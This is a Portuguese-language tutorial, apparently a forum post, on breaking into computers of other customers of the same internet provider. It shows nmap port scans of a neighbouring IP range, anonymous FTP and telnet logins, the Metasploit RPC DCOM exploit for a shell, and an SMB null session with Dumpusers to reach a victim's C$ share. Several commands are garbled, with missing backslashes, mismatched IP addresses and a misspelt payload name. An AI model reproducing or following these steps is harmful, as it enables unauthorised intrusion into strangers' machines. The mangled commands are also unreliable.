Estes ataques precisam ter pessoas do mesmo provedor que você.
Vamos começar:
1. Pegue o seu ip externo(sugestão: www.meuip.com.br).
2. Baixe o nmap e instale no seu pc.
3. Vamos supor que o seu ip seja: 201.33.22.18.
4. Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
Prosseguindo…
5. Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
6. digite:
nmap -sV -T Insane -A -v 201.33.22.1-254 -p21,23,135,44
Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
7. Código:
Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164
Invasao pela porta 21
vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.
Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a
Invasao pela porta 23
Iniciar>Executar>cmd>telnet>open>201.33.22 23
Invasao pela porta 135
CASO a porta 135 aberta, podemos usar o METASPLOIT
abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
depois disso escolha o tipo de conexao como: GERENICSHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.
depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445
Esta porta é de compartilhamento.
Iniciar>Executar>cmd>net use .45.241.175ipc$ “” /u:”"
Comando concluído com êxito.
baixa o Dumpusers
ponha ele no 
abra o cmd digite;
dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:
iniciar>executar>.45.241.175c$
